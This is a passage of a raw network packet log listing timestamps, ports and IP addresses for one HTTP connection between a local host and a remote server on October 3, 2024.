Oct 3, 2024 18:38:13.996193886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.996205091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.996228933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.996241093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.996263981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.996273994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.996309996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.078524113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.078660965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.078715086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.078747988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.078782082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.078816891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.078838110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.078838110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.078851938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.078856945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.078856945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.078888893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.078907013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.078924894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.078954935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.078958988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.078967094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.078993082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.079026937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.079061031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.079092979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.079200029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.079972029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080025911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080044985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080063105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080077887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080100060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080111980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080135107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080153942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080169916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080189943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080204964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080223083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080240011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080256939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080291033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080740929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080792904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080799103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080827951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080847979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080862999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080879927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080899000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080924034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080934048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080950022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.080970049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.080987930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.081003904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.081018925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.081057072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.082155943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.082190037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.082220078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.082223892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.082233906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.082258940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.082277060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.082293034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.082312107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.082329035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.082345963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.082362890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.082382917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.082401037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.082407951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.082453966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.083265066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.083300114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.083326101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.083333969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.083347082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.083369017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.083389044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.083422899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.083425045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.083461046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.083481073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.083494902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.083507061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.083548069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.084404945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.084439993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.084465981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.084471941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.084480047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.084508896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.084526062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.084542990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.084563971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.084579945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.084592104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.084615946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.084631920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.084650040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.084669113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.084680080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.084697962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.084731102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.085752964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.085788965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.085815907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.085823059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.085830927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.085858107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.085875988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.085891962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.085911989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.085927010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.085946083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.085961103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.085974932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.085995913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086014032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086049080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086585045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086620092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086644888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086664915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086671114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086704969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086723089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086739063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086755991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086771965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086786032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086806059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086822987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086858988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086878061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086894035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086908102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086930037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.086946964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.086982012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.088457108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.088499069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.088516951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.088551998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.088660955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.088695049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.088718891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.088742971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.088798046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.088831902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.088857889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.088866949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.088882923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.088903904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.088918924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.088939905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.088953972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.088994026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.089339018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.089396954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.089397907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.089432001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.089448929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.089467049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.089484930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.089502096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.089514017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.089538097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.089551926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.089571953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.089591980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.089606047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.089616060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.089657068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.091818094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.091851950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.091878891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.091886044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.091893911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.091921091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.091942072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.091955900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.091972113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.092009068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.379698992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.379766941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:14.385107994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.385545969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.385576963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.385605097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:14.385632992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:15.107007027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:15.107153893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:15.904325962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:15.904390097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:15.909864902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:15.910156012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:15.910187006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:16.627199888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:16.627516985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:16.686316013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:16.691478014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:17.561914921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:17.562026978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:18.524223089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:18.632867098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:18.633001089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:18.633234024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:18.633299112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:18.633749008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:18.633810997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:18.635642052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:19.347759962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:19.347840071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:19.855218887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:19.862061977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085048914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085098028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085129023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085131884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085158110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085165977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085186958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085200071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085206985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085233927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085246086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085269928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085279942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085329056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085407019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085439920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085450888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085474014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085489988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085506916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085519075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085541010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.085552931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.085587025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.222191095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222206116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222222090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222254038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.222280979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.222604036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222620010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222634077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222650051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222660065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.222686052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.222718954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.222902060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222917080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222930908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222945929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222949028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.222961903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222973108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.222978115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.222994089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.223000050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.223031998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.223046064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.223742962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.223758936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.223773003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.223788023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.223794937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.223803043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.223818064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.223819971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.223838091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.223850012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.223854065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.223866940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.223869085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.223897934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.223923922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.329991102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330049992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330076933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330094099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330110073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330127001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330116987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.330272913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.330272913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.330388069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330404997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330420971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330435991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330439091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.330457926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330467939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.330476999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.330496073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.330533981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.331145048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.331161022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.331176043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.331191063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.331193924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.331208944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.331237078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.331265926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.331644058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.331660986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.331676960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.331691980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.331695080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.331710100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.331732035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.331767082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.332284927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.332300901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.332317114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.332329988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.332334042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.332350969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.332365990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.332376957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.332381964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.332398891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.332416058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.332438946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.332467079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.333542109 CEST	80	49730	185.215.113.37	192.168.2.4
